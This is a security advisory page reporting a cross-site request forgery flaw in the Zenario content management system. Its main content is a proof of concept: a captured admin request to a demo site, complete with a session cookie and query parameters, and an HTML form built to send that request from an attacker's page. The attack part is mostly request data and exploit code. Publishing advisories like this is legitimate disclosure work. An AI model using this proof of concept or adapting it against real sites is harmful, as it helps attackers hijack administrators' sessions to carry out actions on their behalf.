Zenar Content Management System - Cross-Site Request Forgery ( CSRF )

2018.05.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) # Software Link: https://zenar.io/ # Dork: N/A # Author: Ismail Tasdelen # Tested Website: http://demo.zenar.io # Date: 2018-05-21 # Category: Web Application # POC : # GET Request : Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0 Request Method: GET Status Code: 200 OK Remote Address: 213.146.173.88:80 Referrer Policy: no-referrer-when-downgrade Accept: text/plain, */*; q=0.01 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: keep-alive Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1 Host: demo.zenar.io Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36 X-Requested-With: XMLHttpRequest # Query String Parametres : path: zenario__content/panels/content skinId: refinerId: html refinerName: content_type refiner__content_type: html _limit: 50 _start: 0 _item: html_10 _sort_col: first_created_datetime _sort_desc: 0 # CSRF HTML : <html><head> <title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title> </head><body> <form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET"> <input type="text" name="html_" value="10" /><br /> <input type='submit' value='Go!' /> </form> </body></html> # You want to follow my activity ? https://www.linkedin.com/in/ismailtasdelen https://github.com/ismailtasdelen https://twitter.com/ismailtsdln

References:

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top